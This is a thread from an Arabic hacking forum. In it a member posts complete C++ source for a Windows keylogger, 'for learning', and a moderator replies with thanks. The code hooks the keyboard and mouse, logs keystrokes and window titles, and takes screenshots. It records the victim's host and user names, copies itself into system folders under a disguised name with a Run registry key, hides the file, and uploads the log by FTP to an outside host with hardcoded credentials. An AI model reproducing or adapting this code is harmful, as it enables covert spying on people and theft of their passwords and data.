بادئ الموضوع تاريخ البدء
 • المشاهدات 212
 • الردود 1
0x007z

0x007z

Beginner Hacker
إنضم
5 ديسمبر 2019
المشاركات
10
مستوى التفاعل
7
النقاط
3
العمر
20
أفضل الإجابات
0
نظام التشغيل
Linux
ســـلام عليكم

لدي منذ فترة كيلوجر بلغة c++ جميل وقوي

قبل طرح سورس كود اتمنى من اعضاء فهم ميكانية عمل كيلوجر لاتطويره واكتساب خبرة

C++:
#include <windows.h>
#include <stdio.h>
#include <fstream>
#include <iostream>
#include <string.h>
#include <wininet.h>
#include <wingdi.h>

#pragma comment(lib,"ws2_32.lib")

#define visible // (visible / invisible)
#define FILELOG "svc.html"

#define FTP_USER "COLIBRAX"
#define FTP_PASS "LESSUMOGAI@@1"
#define FTP_SERVER "files.000webhost.com"

#define DATA_SIZE 1024*1024*100 //100MB
#define MAXLINE 409600
#define MAX_LENGTH 1024

using namespace std;

//Global Keyboard Hook variable
HHOOK keyboardHook;
//Global Mouse Hook variable
HHOOK mouseHook;
//Global info computer
struct computer {
  
 TCHAR username[MAX_LENGTH+1];
 TCHAR hostname[MAX_LENGTH+1];
} ;

char lastwindow[256];

void getcomputerinfo(computer * victim);
void FileSubmit(char *,char *);
void WriteData(string Text);
LRESULT CALLBACK WindowProcedure (HWND, UINT, WPARAM, LPARAM);
void FileSubmit(char *localfile,char *remotefile);
LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam);
LRESULT CALLBACK MouseProc (int nCode, WPARAM wParam, LPARAM lParam);
void copyto(char *de,char *para,int init);
//screemshot
void TakeScreenShot(char * filename);
//save bmp to file
BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR lpszFileName);// WinMain, a função main em janelas
int WINAPI WinMain (HINSTANCE hThisInstance,
  HINSTANCE hPrevInstance,
  LPSTR lpszArgument,
  int nFunsterStil){
  
  
  
  HWND hwnd;   // O objeto para indicar a janela
  MSG messages;  // Objeto mensagem do Windows para controlar o acionamento de botões
  WNDCLASSEX wincl;  // O objeto para criar a janela
  
  computer * victim;
  victim = new computer();

  wincl.hInstance = hThisInstance;
  wincl.lpszClassName = "whs"; // Nome da classe da janela
  wincl.lpfnWndProc = WindowProcedure;
  wincl.style = CS_DBLCLKS;
  wincl.cbSize = sizeof (WNDCLASSEX);
  wincl.hIcon = LoadIcon (NULL, IDI_APPLICATION);
  wincl.hIconSm = LoadIcon (NULL, IDI_APPLICATION);   // Janela com icone default do Windows
  wincl.hCursor = LoadCursor (NULL, IDC_ARROW);     //Cursor default
  wincl.lpszMenuName = NULL;
  wincl.cbClsExtra = 0;
  wincl.cbWndExtra = 0;
  wincl.hbrBackground = (HBRUSH) COLOR_BACKGROUND;    // Cor cinza de background
  
  if (!RegisterClassEx (&wincl)) // Se o registro da classe foi mal-sucedido return 0
    return 0;
  
  hwnd = CreateWindowEx (        // Criação da janela
    0,
    "whs",         // Indicação da classe da janela
    "WHS - MONITOR",         // Nome da janela
    WS_TILEDWINDOW ,      // Estilo da janela
    10,                // x em relação ao desktop
    10,                 // y em relação ao desktop
    800,                 // largura da janela
    600,                // altura da janela
    HWND_DESKTOP,
    NULL,
    hThisInstance,
    NULL
  );
  
  //pegar informações sobre a maquina
  getcomputerinfo(victim);
  
  
  //auto copia inicia
  char system[MAX_PATH];
  char windows[MAX_PATH];
  char pathtofile[MAX_PATH];
  HMODULE GetModH = GetModuleHandle(NULL);
  GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
  GetSystemDirectory(system,sizeof(system));
  GetWindowsDirectory(windows,sizeof(windows));
  
  strcat(system,"\\winsv.exe");
  strcat(windows,"\\winsv.exe");
  copyto(pathtofile,system,true);
  copyto(pathtofile,windows,false);
  #ifdef visible
          // Mostrar a janela
      ShowWindow (hwnd, nFunsterStil);
  #endif
  
  //envia o log
  FileSubmit((char * )FILELOG,victim->username);


  //Initialise the keyboard Hook
  keyboardHook = SetWindowsHookEx( WH_KEYBOARD_LL, KeyboardProc, GetModuleHandle(NULL), 0 );
  mouseHook   = SetWindowsHookEx( WH_MOUSE_LL  , MouseProc  , GetModuleHandle(NULL), 0 );
  
  while (GetMessage (&messages, NULL, 0, 0)) // Recuperar mensagens
  {
    TranslateMessage(&messages);
    DispatchMessage(&messages);
  }
  
  UnhookWindowsHookEx(keyboardHook);
  UnhookWindowsHookEx(mouseHook);
  
  return 0;
}

LRESULT CALLBACK WindowProcedure (HWND hwnd, UINT message, WPARAM wParam, LPARAM lParam)
  {
  switch (message)
  {
    case WM_CREATE: // Criação da janela
      CreateWindow(TEXT("STATIC"), TEXT("texto"), WS_CHILD |WS_HSCROLL| WS_VISIBLE | WS_BORDER, 1, 1, 800, 600, hwnd, NULL, NULL, NULL);
    break;
    case WM_COMMAND:  // Interpretação da janela
    break;
    case WM_DESTROY:  // Destruição da janela
      PostQuitMessage (0);
    break;
    default:
      return DefWindowProc (hwnd, message, wParam, lParam);
  }
  return 0;
}

void FileSubmit(char *localfile,char *remotefile)
{
  HINTERNET hInternet;
  HINTERNET hFtpSession;
  hInternet = InternetOpen(NULL, INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
  if (hInternet == NULL)
  {
    cout << "Error: " << GetLastError();
    
  }
  else
  {
    hFtpSession = InternetConnect(hInternet,FTP_SERVER, INTERNET_DEFAULT_FTP_PORT, FTP_USER, FTP_PASS, INTERNET_SERVICE_FTP, 0, 0);
    if (hFtpSession == NULL)
    {
      cout << "Error ftp: " << GetLastError();
    }
    else
    {

      if(FtpPutFile(hFtpSession, localfile, remotefile, FTP_TRANSFER_TYPE_BINARY, 0));
      
    }
  }
}

void TakeScreenShot(char * filename) {
 int x1, y1, x2, y2, w, h;

  // get screen dimensions
  x1 = GetSystemMetrics(SM_XVIRTUALSCREEN);
  y1 = GetSystemMetrics(SM_YVIRTUALSCREEN);
  x2 = GetSystemMetrics(SM_CXVIRTUALSCREEN);
  y2 = GetSystemMetrics(SM_CYVIRTUALSCREEN);
  w  = x2 - x1;
  h  = y2 - y1;

  // copy screen to bitmap
  HDC   hScreen = GetDC(NULL);
  HDC   hDC   = CreateCompatibleDC(hScreen);
  HBITMAP hBitmap = CreateCompatibleBitmap(hScreen, w, h);
  HGDIOBJ old_obj = SelectObject(hDC, hBitmap);
  BOOL  bRet  = BitBlt(hDC, 0, 0, w, h, hScreen, x1, y1, SRCCOPY);
  
  SaveHBITMAPToFile(hBitmap,filename);
  //CLEAN
  SelectObject(hDC, old_obj);
  DeleteDC(hDC);
  ReleaseDC(NULL, hScreen);
  DeleteObject(hBitmap);
};

BOOL SaveHBITMAPToFile(HBITMAP hBitmap, LPCTSTR lpszFileName)
{
  string base64;
  HDC hDC;
  int iBits;
  WORD wBitCount;
  DWORD dwPaletteSize = 0, dwBmBitsSize = 0, dwDIBSize = 0, dwWritten = 0;
  BITMAP Bitmap0;
  BITMAPFILEHEADER bmfHdr;
  BITMAPINFOHEADER bi;
  LPBITMAPINFOHEADER lpbi;
  HANDLE fh, hDib, hPal, hOldPal2 = NULL;
  hDC = CreateDC(TEXT("DISPLAY"), NULL, NULL, NULL);
  iBits = GetDeviceCaps(hDC, BITSPIXEL) * GetDeviceCaps(hDC, PLANES);
  DeleteDC(hDC);
  if (iBits <= 1)
    wBitCount = 1;
  else if (iBits <= 4)
    wBitCount = 4;
  else if (iBits <= 8)
    wBitCount = 8;
  else
    wBitCount = 24;
  GetObject(hBitmap, sizeof(Bitmap0), (LPSTR)&Bitmap0);
  bi.biSize = sizeof(BITMAPINFOHEADER);
  bi.biWidth = Bitmap0.bmWidth;
  bi.biHeight = -Bitmap0.bmHeight;
  bi.biPlanes = 1;
  bi.biBitCount = wBitCount;
  bi.biCompression = BI_RGB;
  bi.biSizeImage = 0;
  bi.biXPelsPerMeter = 0;
  bi.biYPelsPerMeter = 0;
  bi.biClrImportant = 0;
  bi.biClrUsed = 256;
  dwBmBitsSize = ((Bitmap0.bmWidth * wBitCount + 31) & ~31) / 8
    * Bitmap0.bmHeight;
  hDib = GlobalAlloc(GHND, dwBmBitsSize + dwPaletteSize + sizeof(BITMAPINFOHEADER));
  lpbi = (LPBITMAPINFOHEADER)GlobalLock(hDib);
  *lpbi = bi;

  hPal = GetStockObject(DEFAULT_PALETTE);
  if (hPal)
  {
    hDC = GetDC(NULL);
    hOldPal2 = SelectPalette(hDC, (HPALETTE)hPal, FALSE);
    RealizePalette(hDC);
  }


  GetDIBits(hDC, hBitmap, 0, (UINT)Bitmap0.bmHeight, (LPSTR)lpbi + sizeof(BITMAPINFOHEADER)
    + dwPaletteSize, (BITMAPINFO *)lpbi, DIB_RGB_COLORS);

  if (hOldPal2)
  {
    SelectPalette(hDC, (HPALETTE)hOldPal2, TRUE);
    RealizePalette(hDC);
    ReleaseDC(NULL, hDC);
  }

/* fh = CreateFile(lpszFileName, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS,
    FILE_ATTRIBUTE_NORMAL | FILE_FLAG_SEQUENTIAL_SCAN, NULL);

  if (fh == INVALID_HANDLE_VALUE)
    return FALSE;
*/
  bmfHdr.bfType = 0x4D42; // "BM"
  dwDIBSize = sizeof(BITMAPFILEHEADER) + sizeof(BITMAPINFOHEADER) + dwPaletteSize + dwBmBitsSize;
  bmfHdr.bfSize = dwDIBSize;
  bmfHdr.bfReserved1 = 0;
  bmfHdr.bfReserved2 = 0;
  bmfHdr.bfOffBits = (DWORD)sizeof(BITMAPFILEHEADER) + (DWORD)sizeof(BITMAPINFOHEADER) + dwPaletteSize;
/*
  base64.append("<img src=\"data:image/jpeg;base64,");
  base64.append((LPSTR)&bmfHdr);
  base64.append((LPSTR)&lpbi);
  cout<< base64;
*/
/* WriteFile(fh, (LPSTR)&bmfHdr, sizeof(BITMAPFILEHEADER), &dwWritten, NULL);

  WriteFile(fh, (LPSTR)lpbi, dwDIBSize, &dwWritten, NULL);
*/
  GlobalUnlock(hDib);
  GlobalFree(hDib);
  CloseHandle(fh);
  return TRUE;
}
 
 void virarTela(){
  
  DEVMODE mode;
  ZeroMemory(&mode, sizeof(mode));
  mode.dmSize = sizeof(mode);

  if (EnumDisplaySettings(NULL, ENUM_CURRENT_SETTINGS, &mode)){
    mode.dmDisplayOrientation = DMDO_180;

    if (ChangeDisplaySettings(&mode, 0) == DISP_CHANGE_SUCCESSFUL){
      Sleep(5000);
      //restore defaults
      mode.dmDisplayOrientation = DMDO_DEFAULT;
      ChangeDisplaySettings(&mode, 0);
    }
  }
 }
 
 void getcomputerinfo(computer * victim){
  
  
  DWORD size = MAX_LENGTH;
  GetComputerName(victim->hostname, &size);
  WriteData("hostname: ");
  WriteData(victim->hostname);
  WriteData("<br />");
  
  size = sizeof(victim->username) / sizeof(victim->username[0]);
  GetUserName(victim->username, &size);
  WriteData("username: ");
  WriteData(victim->username);
  WriteData("<br />");
  
}


void WriteData(string Text)
{
  ofstream LogFile;
  LogFile.open(FILELOG, fstream::app);
  LogFile << Text;
  LogFile.close();
}


bool SpecialCharacters(int vKey)
{
  //If Shift is pressed
  if (GetKeyState(VK_SHIFT) & 0x8000)
  {
     switch(vKey)
    {
      case 9:
        WriteData("<TAB>");
        break;
      case 8:
        WriteData("<BACKSPACE>");
        break;
      case 13:
        WriteData("\n<ENTER>");
        break;
      case 27:
        WriteData("<ESC>");
        break;
      case 46:
        WriteData("<DELETE>");
        break;
      case 48:
        WriteData(")");
        break;
      case 49:
        WriteData("!");
        break;
      case 50:
        WriteData("@");
        break;
      case 51:
        WriteData("#");
        break;
      case 52:
        WriteData("$");
        break;
      case 53:
        WriteData("%");
        break;
      case 54:
        WriteData("^");
        break;
      case 55:
        WriteData("&");
        break;
      case 56:
        WriteData("*");
        break;
      case 57:
        WriteData("(");
        break;
      case -64:
        WriteData("~");
        break;
      case -67:
        WriteData("_");
        break;
      case -69:
        WriteData("+");
        break;
      case -70:
        WriteData(":");
        break;
      case -34:
        WriteData("\"");
        break;
      case -68:
        WriteData("<");
        break;
      case -66:
        WriteData(">");
        break;
      case -65:
        WriteData("?");
        break;
      default:
        return false;
    }
    return true;
  }
  //If Shift is unpressed
  else
  {
    if (vKey > 47 && vKey < 58)
    {
      switch (vKey)
      {
        case 48:
          WriteData("0");
          break;
        case 49:
          WriteData("1");
          break;
        case 50:
          WriteData("2");
          break;
        case 51:
          WriteData("3");
          break;
        case 52:
          WriteData("4");
          break;
        case 53:
          WriteData("5");
          break;
        case 54:
          WriteData("6");
          break;
        case 55:
          WriteData("7");
          break;
        case 56:
          WriteData("8");
          break;
        case 57:
          WriteData("9");
          break;

      }
    }
    switch (vKey)
    {
      case 9:
        WriteData("<TAB>");
        break;
      case 8:
        WriteData("<BACKSPACE>");
        break;
      case 13:
        WriteData("\n<ENTER>");
        break;
      case 32:
        WriteData(" ");
        break;
      case -95:
        WriteData("<SHIFT>");
        break;
      case -96:
        WriteData("<SHIFT>");
        break;
      case -66:
        WriteData(".");
        break;
      case -68:
        WriteData(",");
        break;
      case -67:
        WriteData("-");
        break;
      case 27:
        WriteData("<ESC>");
        break;
      case -69:
        WriteData("=");
        break;
      case 38:
        WriteData("[Cima]");
        break;
      case 40:
        WriteData("[Baixo>]");
        break;
      case 37:
        WriteData("[Esquerda]");
        break;
      case 39:
        WriteData("[Direita]");
        break;
      case 46:
        WriteData("<DELETE>");
        break;
      case -70:
        WriteData(";");
        break;
      case -34:
        WriteData("'");
        break;
      default:
        return false;
    }
    return true;
  }
}


void Log(char Key)
{
  char log[255];
  HWND foreground = GetForegroundWindow();
  if (foreground)
  {
    char window_title[256];
    GetWindowText(foreground, window_title, 256);
    
    if(strcmp(window_title, lastwindow)!=0) {
      strcpy(lastwindow, window_title);
      
      sprintf(log,"%s<br/><a>",log);
      sprintf(log,"%s%s",log,lastwindow);
      sprintf(log,"%s</a>",log);
    }
  }
  //Check for special characters (Shift, Enter etc.)
  
  if (SpecialCharacters(Key) == false)
  {
    //If not special character check A-Z
    if (Key > 64 && Key < 91)
    {
      //If Shift AND Caps Lock = Lowercase
      if (GetKeyState(VK_SHIFT) & 0x8000 && (GetKeyState(VK_CAPITAL) & 0x0001)!=0)
      {
        Key += 32;
        sprintf(log,"%s%c",log,Key);
      }
      //If Shift OR Caps Lock = Uppercase
      else if (GetKeyState(VK_SHIFT) & 0x8000 || (GetKeyState(VK_CAPITAL) & 0x0001)!=0)
      {
        
        sprintf(log,"%s%c",log,Key);
      }
      //No Shift or Caps Lock = Lowercase
      else
      {
        Key += 32;
        sprintf(log,"%s%c",log,Key);
      }
    } else {
      if(Key>95&&Key<106){//numerico numpad
        Key-=48;
        sprintf(log,"%s%c",log,Key);
       } else {
        switch(Key){
          case 110:
            sprintf(log,"%s,",log, Key );
          break;
          case -62:
            sprintf(log,"%s.",log, Key );
          break;
          case 111:
            sprintf(log,"%s/",log, Key );
          break;
          case 106:
            sprintf(log,"%s*",log, Key );
          break;
          case 109:
            sprintf(log,"%s-",log, Key );
          break;
          case 107:
            sprintf(log,"%s+",log, Key );
          break;
          default:
            printf(log,"%s \nE-%d",log, Key );
          break;
        
        } 
      }
    }
    
  }
   WriteData(log);
   sprintf(log,"");
}

LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
  PKBDLLHOOKSTRUCT key = (PKBDLLHOOKSTRUCT)lParam;
  if (wParam == WM_KEYDOWN && nCode == HC_ACTION )
  {
    //Pass keystroke character into Log function
    char Key = key->vkCode;
    Log(Key);
  }
  //Wait for next keystroke
  return CallNextHookEx(keyboardHook, nCode, wParam, lParam);
}

LRESULT CALLBACK MouseProc (int nCode, WPARAM wParam, LPARAM lParam)
{
  MOUSEHOOKSTRUCT * pMouseStruct = (MOUSEHOOKSTRUCT *)lParam;
  if (pMouseStruct != NULL){
    if(wParam == WM_LBUTTONDOWN)
    {
      TakeScreenShot((char *)"test.bmp");
      //printf( "clicked" );
    }
    //printf("Mouse position X = %d Mouse Position Y = %d\n", pMouseStruct->pt.x,pMouseStruct->pt.y);
  }
  return CallNextHookEx(mouseHook, nCode, wParam, lParam);
}

void copyto(char *de,char *para,int init)
{
  CopyFile((LPCSTR)de,(LPCSTR)para,false);
  HKEY hKey;
  if(init){
    RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE,&hKey );
    RegSetValueEx(hKey, "Microsoft Windows Live",0,REG_SZ,(const unsigned char*)para,sizeof(para));
    RegCloseKey(hKey);
  }
  SetFileAttributesA((LPCSTR)para,FILE_ATTRIBUTE_HIDDEN);
}
 
assdsiwi

assdsiwi

:: Super Moderator ::
طاقم الإدارة
إنضم
22 مارس 2019
المشاركات
215
مستوى التفاعل
304
النقاط
63
أفضل الإجابات
1
نظام التشغيل
Linux
تسلم
 

كلمة المدير

جميع المواضيع والمشاركات المكتوبة تعبّر عن وجهة نظر صاحبها ,, ولا تعبّر بأي شكل من الاشكال عن وجهة نظر إدارة المنتدى .

تواصل مع فريق العمل

 • Sa3Ka

 • 966-000000000

 • info@sa3ka.com

 • www.sa3ka.com

عن شبكة الصاعقة العربية - [Sa3eka]

شبكة الصاعقة موقع اجتماعي يهتم بتطوير مهارات الحماية والاختراق وطرق الاستهداف بشروحات مفيدة.

تابعنا على المواقع الاجتماعية


إتصل بنا

 

أعلى

خيارات الاستايل

تلوين الاقسام
خلفية المنتدى
نوع الخط
جدول المنتديات
تمديد المنتدى
فصل الأقسام
إخفاء السايدبار
حجم الخط
الصورة الرمزية
بيانات العضو
إخفاء التواقيع

إرجاع خيارات الإستايل